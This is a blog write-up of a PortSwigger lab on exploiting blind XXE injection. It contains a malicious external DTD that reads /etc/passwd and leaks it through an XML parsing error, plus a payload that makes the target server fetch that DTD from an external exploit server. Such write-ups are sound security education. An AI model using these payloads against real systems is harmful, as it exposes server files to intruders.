siunam's Website

My personal website

Home Writeups Research Blog Projects About

Exploiting blind XXE to retrieve data via error messages | Dec 25, 2022

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you'll learn: Exploiting blind XXE to retrieve data via error messages! Without further ado, let's dive in.

Background

This lab has a "Check stock" feature that parses XML input but does not display the result.

To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file.

The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

Exploitation

Home page:

In the previous labs, we found that there is an XXE injection vulnerability in the "Check stock" feature, which parses XML input.

Original XML data:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
    <productId>1</productId>
    <storeId>1</storeId>
</stockCheck>

Invalid XML data:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
    <productId>a</productId>
    <storeId>1</storeId>
</stockCheck>

As you can see, it does not display the result, which indicates that this is a blind XXE injection.

To exploit that, we can trigger an XML parsing error, and the error message contains the sensitive data, like /etc/passwd.

In the lab, we have an exploit server, which allows us to host a malicious external DTD:

Our malicious external DTD:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///errorpls/%file;'>">
%eval;
%error;

Which will:

Next, to let the target server fetches our malicious external DTD, we can send the following XXE payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "https://exploit-0a23009a04971e0cc67c8e9a01d90009.exploit-server.net/exploit.dtd"> %xxe;]>
<stockCheck>
    <productId>a</productId>
    <storeId>1</storeId>
</stockCheck>

Which will:

We did it!

What we've learned:

  1. Exploiting blind XXE to retrieve data via error messages